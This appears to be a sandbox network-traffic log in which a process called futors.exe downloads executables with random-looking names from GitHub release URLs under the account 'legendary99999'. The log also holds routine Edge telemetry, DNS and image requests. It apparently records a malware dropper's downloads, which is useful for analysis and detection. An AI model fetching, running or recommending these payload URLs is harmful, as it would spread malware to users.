productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com copilotprodattachments.blob.core.windows.net/github-production-copilot-attachments/ github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/
Server: github.com
X-GitHub-Request-Id: B7B0:2ED5DF:1A85043:20BA2DB:67E74D3A
GET

https://github.com/legendary99999/vfdfavsaf/releases/download/fdsxfasdfsdaf/alex1dskfmdsf.exe

futors.exe

Remote address:

20.26.156.215:443

Request

GET /legendary99999/vfdfavsaf/releases/download/fdsxfasdfsdaf/alex1dskfmdsf.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 302 Found

Date: Sat, 29 Mar 2025 01:30:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame,Accept-Encoding, Accept, X-Requested-With
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/953100962/0fb6522f-c6fd-4f89-8ac9-d2cfdf8f9919?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250329T013050Z&X-Amz-Expires=300&X-Amz-Signature=3a44b1e5fc6e0ace5cdd851d4d524dc12ec47ea8851a2a11e76c557df6355dc3&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dalex1dskfmdsf.exe&response-content-type=application%2Foctet-stream
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com copilotprodattachments.blob.core.windows.net/github-production-copilot-attachments/ github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/
Server: github.com
X-GitHub-Request-Id: B7B0:2ED5DF:1A85612:20BAAA3:67E74D3B
GET

https://github.com/legendary99999/vdsavdfvdfavsfd/releases/download/fdgvafdvadfvafdv/jokererer.exe

futors.exe

Remote address:

20.26.156.215:443

Request

GET /legendary99999/vdsavdfvdfavsfd/releases/download/fdgvafdvadfvafdv/jokererer.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 302 Found

Date: Sat, 29 Mar 2025 01:31:09 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame,Accept-Encoding, Accept, X-Requested-With
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/956649226/4d80b2da-e546-43e3-8ae4-f6bdab322270?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250329T013109Z&X-Amz-Expires=300&X-Amz-Signature=f670f6df372bfddfc0b556507bc103ffeef18dca4faf171da3224990ff4404c1&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Djokererer.exe&response-content-type=application%2Foctet-stream
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com copilotprodattachments.blob.core.windows.net/github-production-copilot-attachments/ github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/
Server: github.com
X-GitHub-Request-Id: B7B0:2ED5DF:1A85EA1:20BB5BE:67E74D4A
GET

https://c.msn.com/c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0

msedge.exe

Remote address:

13.74.129.1:443

Request

GET /c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0 HTTP/2.0
host: c.msn.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: _C_ETH=1
cookie: USRLOC=
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: _EDGE_V=1
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531
priority: i

Response

HTTP/2.0 302

cache-control: private, no-cache, proxy-revalidate, no-store
pragma: no-cache
location: https://c.bing.com/c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F389EF4220A144399D7923EC5F6AD764&RedC=c.msn.com&MXFR=1BCC9635343F60E02399838B3518610E
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
set-cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
set-cookie: MUID=1BCC9635343F60E02399838B3518610E; domain=.msn.com; expires=Thu, 23-Apr-2026 01:30:34 GMT; path=/; SameSite=None; Secure; Priority=High;
date: Sat, 29 Mar 2025 01:30:34 GMT
content-length: 0
DNS

browser.events.data.msn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

browser.events.data.msn.com

IN A

Response

browser.events.data.msn.com

IN CNAME

global.asimov.events.data.trafficmanager.net

global.asimov.events.data.trafficmanager.net

IN CNAME

onedscolprduks04.uksouth.cloudapp.azure.com

onedscolprduks04.uksouth.cloudapp.azure.com

IN A

51.104.15.253
DNS

browser.events.data.msn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

browser.events.data.msn.com

IN Unknown

Response

browser.events.data.msn.com

IN CNAME

global.asimov.events.data.trafficmanager.net

global.asimov.events.data.trafficmanager.net

IN CNAME

onedscolprdgwc04.germanywestcentral.cloudapp.azure.com
POST

https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211833395&time-delta-to-apply-millis=use-collector-delta&w=0&NoResponseBody=true

msedge.exe

Remote address:

51.104.15.253:443

Request

POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1743211833395&time-delta-to-apply-millis=use-collector-delta&w=0&NoResponseBody=true HTTP/2.0
host: browser.events.data.msn.com
content-length: 4037
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
content-type: text/plain;charset=UTF-8
sec-ch-ua-mobile: ?0
accept: */*
origin: https://ntp.msn.com
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: _C_ETH=1
cookie: USRLOC=
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: _EDGE_V=1
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Mar+29+2025+01%3A30%3A33+GMT%2B0000+(Coordinated+Universal+Time)&version=202408.1.0&browserGpcFlag=0&isIABGlobal=false&hosts=&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531
priority: u=4, i

Response

HTTP/2.0 204

content-length: 0
server: Microsoft-HTTPAPI/2.0
strict-transport-security: max-age=31536000
p3p: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
set-cookie: MC1=GUID=0ec8683b8ad04e719247a49dd8e1788a&HASH=0ec8&LV=202503&V=4&LU=1743211834898; Domain=.microsoft.com; Expires=Sun, 29 Mar 2026 01:30:34 GMT; Path=/;Secure; SameSite=None
set-cookie: MS0=a837ed00e8d64af4a32dea9c98e30c95; Domain=.microsoft.com; Expires=Sat, 29 Mar 2025 02:00:34 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 1503
access-control-allow-headers: P3P,Set-Cookie,time-delta-millis
access-control-allow-methods: POST
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
access-control-expose-headers: time-delta-millis
date: Sat, 29 Mar 2025 01:30:34 GMT
GET

https://c.bing.com/c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F389EF4220A144399D7923EC5F6AD764&RedC=c.msn.com&MXFR=1BCC9635343F60E02399838B3518610E

msedge.exe

Remote address:

150.171.27.10:443

Request

GET /c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F389EF4220A144399D7923EC5F6AD764&RedC=c.msn.com&MXFR=1BCC9635343F60E02399838B3518610E HTTP/2.0
host: c.bing.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: i

Response

HTTP/2.0 302

cache-control: private, no-cache, proxy-revalidate, no-store
pragma: no-cache
location: https://c.msn.com/c.gif?rnd=1743211833396&udc=true&pg.n=default&pg.t=dhp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-gb&rid=583592b502f9469cba059551f752edaf&activityId=583592b502f9469cba059551f752edaf&d.imd=false&scr=1280x720&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=F389EF4220A144399D7923EC5F6AD764&MUID=1BCC9635343F60E02399838B3518610E
p3p: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
set-cookie: MUID=1BCC9635343F60E02399838B3518610E; domain=.bing.com; expires=Thu, 23-Apr-2026 01:30:35 GMT; path=/; SameSite=None; Secure; Priority=High;
set-cookie: MR=0; domain=c.bing.com; expires=Sat, 05-Apr-2025 01:30:35 GMT; path=/; SameSite=None; Secure;
set-cookie: SRM_B=1BCC9635343F60E02399838B3518610E; domain=c.bing.com; expires=Thu, 23-Apr-2026 01:30:35 GMT; path=/; SameSite=None; Secure;
set-cookie: SRM_M=1BCC9635343F60E02399838B3518610E; domain=c.bing.com; expires=Thu, 23-Apr-2026 01:30:35 GMT; path=/; SameSite=None; Secure;
x-powered-by: ASP.NET
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4A82E143E64F4C2586CD14510C8FF110 Ref B: LON04EDGE0614 Ref C: 2025-03-29T01:30:35Z
date: Sat, 29 Mar 2025 01:30:34 GMT
content-length: 0
DNS

edge.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

edge.microsoft.com

IN A

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net

edge-microsoft-com.ax-0002.ax-msedge.net

IN CNAME

ax-0002.ax-msedge.net

ax-0002.ax-msedge.net

IN A

150.171.27.11

ax-0002.ax-msedge.net

IN A

150.171.28.11
DNS

edge.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

edge.microsoft.com

IN Unknown

Response

edge.microsoft.com

IN CNAME

edge-domain.trafficmanager.net

edge-domain.trafficmanager.net

IN CNAME

edge-microsoft-com.ax-0002.ax-msedge.net

edge-microsoft-com.ax-0002.ax-msedge.net

IN CNAME

ax-0002.ax-msedge.net
GET

https://edge.microsoft.com/autofillservice/core/page/-581949006304227928/4169934183265382350?CIdAlgoVersion=2

msedge.exe

Remote address:

150.171.27.11:443

Request

GET /autofillservice/core/page/-581949006304227928/4169934183265382350?CIdAlgoVersion=2 HTTP/2.0
host: edge.microsoft.com
x-client-data: COjeygE=
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=4, i

Response

HTTP/2.0 200

cache-control: max-age=691200
content-length: 180
content-type: application/json; charset=utf-8
x-cache: TCP_HIT
x-msedge-ref: Ref A: B0EEA7F59B884237B435C2C4861AA461 Ref B: LON04EDGE0720 Ref C: 2025-03-29T01:30:35Z
date: Sat, 29 Mar 2025 01:30:35 GMT
GET

https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1msBhw?w=0&h=0&q=60&m=6&f=jpg&u=t

msedge.exe

Remote address:

2.19.252.151:443

Request

GET /tenant/amp/entityid/BB1msBhw?w=0&h=0&q=60&m=6&f=jpg&u=t HTTP/2.0
host: img-s-msn-com.akamaized.net
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=1, i

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
content-location: https://img.s-msn.com/tenant/amp/entityid/BB1msBhw?w=0&h=0&q=60&m=6&f=jpg&u=t
last-modified: Thu, 20 Mar 2025 19:59:11 GMT
x-source-length: 71145
x-datacenter: westus
x-activityid: e2760d15-d987-49c8-a86f-4dad878c572c
timing-allow-origin: *
x-frame-options: deny
x-resizerversion: 1.0
content-length: 131072
cache-control: public, max-age=109674
expires: Sun, 30 Mar 2025 07:58:29 GMT
date: Sat, 29 Mar 2025 01:30:35 GMT
alt-svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,quic=":443"; ma=93600; v="43"
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
GET

https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA13Q6AL.img

msedge.exe

Remote address:

2.19.252.151:443

Request

GET /tenant/amp/entityid/AA13Q6AL.img HTTP/2.0
host: img-s-msn-com.akamaized.net
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
if-modified-since: Tue, 11 Mar 2025 14:28:14 GMT
priority: u=1, i

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-location: https://img.s-msn.com/tenant/amp/entityid/AA13Q6AL
last-modified: Fri, 21 Mar 2025 13:44:57 GMT
x-source-length: 1658
x-datacenter: eastus
x-activityid: 2bcffe53-3d98-4ad5-ae56-1b148185d126
timing-allow-origin: *
x-frame-options: deny
x-resizerversion: 1.0
content-length: 1658
cache-control: public, max-age=173758
expires: Mon, 31 Mar 2025 01:46:33 GMT
date: Sat, 29 Mar 2025 01:30:35 GMT
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
GET

https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA18wU7w.img

msedge.exe

Remote address:

2.19.252.151:443

Request

GET /tenant/amp/entityid/AA18wU7w.img HTTP/2.0
host: img-s-msn-com.akamaized.net
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
sec-fetch-storage-access: active
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
if-modified-since: Tue, 04 Mar 2025 18:01:56 GMT
priority: u=1, i

Response

HTTP/2.0 200

access-control-allow-origin: *
